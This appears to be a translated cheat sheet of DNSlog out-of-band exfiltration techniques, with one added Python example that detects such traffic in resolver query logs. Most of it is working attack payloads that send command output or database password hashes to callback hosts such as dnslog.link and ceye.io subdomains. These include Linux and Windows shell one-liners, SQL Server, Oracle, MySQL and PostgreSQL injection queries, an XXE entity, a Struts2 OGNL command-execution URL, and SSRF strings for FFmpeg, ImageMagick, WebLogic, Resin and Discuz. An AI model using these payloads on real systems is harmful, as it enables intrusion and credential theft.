• Platform source code
    https://github.com/BugScanTeam/DNSLog
    https://github.com/LandGrey/dnstricker
  • Known platforms
    http://ceye.io/
    https://www.t00ls.net/dnslog.html

  • DNSlog attack tricks

linux:

curl http://xxx.dnslog.link/`whoami`
ping -c 1 `whoami`.xxx.dnslog.link

If the output contains a space (newline, etc.), it is cut off there and only the part before it is sent; in that case encode the output first, but note that the number of output characters is limited by the maximum length of the label/URL;
curl http://xxx.dnslog.link/$(id|base64)

For commands like ls that produce several lines of output, use a loop instead;
for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;
Source: https://www.0dayhack.com/post-481.html

windows:

Using HTTP requests:
for /F %x in ('whoami') do start http://xxx.dnslog.link/%x
start opens the result as a URL in the default browser;

Using DNS requests (whoami prints COMPUTERNAME\username, so the backslash is used as the delimiter):
Get the computer name: for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
Get the user name: for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link

cmd cannot encode the output, but the same can be done with PowerShell;

dir has the /b switch, which omits modification dates and other details and prints only file names, so each name can be sent out the same way;
for /F %x in ('dir /b C:\') do start http://xxx.dnslog.link/[%x].jpg
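The defender's side of the tricks above, for both the Linux loop/base64 variants and the Windows for /F variants: an added example, not code from the original page or from any of the platforms it links. It is a small Python script that reads resolver query logs (BIND9 querylog format is assumed) and flags the two traces these payloads leave behind: a leading DNS label that base64-decodes to readable text, and a burst of many distinct subdomains of one zone from one client within a few seconds. The log lines, client addresses, timestamps and the zone abc.dnslog.link are all constructed for the example.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Log format assumed: BIND9 querylog lines. Timestamps, client addresses and
# the callback zone "abc.dnslog.link" are constructed for this example.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) client "
    r"(?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)
# A leading label that could be base64 output of something like `id | base64`.
B64_LABEL_RE = re.compile(r"^[A-Za-z0-9+/=]{16,}$")

# Constructed output of `id | base64`, used to build one of the sample lines.
ENCODED_ID = base64.b64encode(b"uid=0(root) gid=0(root)\n").decode()

SAMPLE_LOG = f"""\
12-Mar-2024 10:00:01.000 client 10.0.0.5#41000: query: www.example.com IN A +
12-Mar-2024 10:00:02.000 client 10.0.0.5#41001: query: root.abc.dnslog.link IN A +
12-Mar-2024 10:00:03.000 client 10.0.0.5#41002: query: {ENCODED_ID}.abc.dnslog.link IN A +
12-Mar-2024 10:00:04.000 client 10.0.0.5#41003: query: bin.abc.dnslog.link IN A +
12-Mar-2024 10:00:04.100 client 10.0.0.5#41004: query: etc.abc.dnslog.link IN A +
12-Mar-2024 10:00:04.200 client 10.0.0.5#41005: query: home.abc.dnslog.link IN A +
12-Mar-2024 10:00:04.300 client 10.0.0.5#41006: query: usr.abc.dnslog.link IN A +
12-Mar-2024 10:00:04.400 client 10.0.0.5#41007: query: var.abc.dnslog.link IN A +
12-Mar-2024 10:00:05.000 client 10.0.0.7#52000: query: mail.example.com IN MX +
"""


def parse_line(line):
    """Parse one querylog line into a dict, or None for lines in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f"),
        "client": m["client"],
        # Keep the original case: base64 labels are case-sensitive.
        "qname": m["qname"].rstrip("."),
    }


def decode_label(label):
    """Return the decoded text when `label` is base64 of mostly printable text, else None."""
    if not B64_LABEL_RE.match(label):
        return None
    padded = label + "=" * (-len(label) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(padded, validate=True)
    except ValueError:
        return None
    if not raw:
        return None
    # Printable ASCII plus tab/newline/CR; random bytes from a legitimate long label fail this.
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    if printable / len(raw) < 0.9:
        return None
    return raw.decode("ascii", errors="replace")


def parent_domain(qname, depth=3):
    """The callback zone, assumed here to be the last `depth` labels of the name."""
    return ".".join(qname.split(".")[-depth:])


def find_bursts(events, window=timedelta(seconds=10), threshold=5):
    """Flag (client, zone) pairs with >= `threshold` distinct leading labels inside `window`,
    the trace left by a loop such as: for i in $(ls /); do curl "http://$i.xxx.dnslog.link/"; done"""
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev["client"], parent_domain(ev["qname"]))].append(ev)
    hits = []
    for (client, zone), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            labels = {e["qname"].split(".")[0]
                      for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(labels) >= threshold:
                hits.append((client, zone, sorted(labels)))
                break
    return hits


def analyze(log_text):
    """Run both checks over a block of querylog text."""
    events = [ev for ev in map(parse_line, log_text.splitlines()) if ev]
    decoded = []
    for ev in events:
        text = decode_label(ev["qname"].split(".")[0])
        if text is not None:
            decoded.append((ev["client"], ev["qname"], text))
    return {"decoded": decoded, "bursts": find_bursts(events)}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for client, qname, text in report["decoded"]:
        print(f"encoded label from {client}: {qname} -> {text.strip()!r}")
    for client, zone, labels in report["bursts"]:
        print(f"burst from {client} under {zone}: {labels}")
```

The burst rule fires on any client that walks many subdomains of one zone in a short window, so CDN and service-discovery zones need an allow-list in practice; the base64 rule is the cheaper and more specific of the two, since ordinary hostnames almost never decode to printable text.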

  • ceye.io payloads

Command Execution

  1. *nix:
curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io
  2. Windows
ping %USERNAME%.b182oj.ceye.io

SQL Injection

  • SQL Server
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');
  • Oracle
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;
  • MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
  • PostgreSQL
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

XML Entity Injection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

Others

  • Struts2
xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
  • FFMpeg
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://ip.port.b182oj.ceye.io
#EXT-X-ENDLIST
  • Weblogic
xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
  • ImageMagick
push graphic-context
viewbox 0 0 640 480
fill 'url(http://ip.port.b182oj.ceye.io)'
pop graphic-context
  • Resin
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf
  • Discuz
http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo
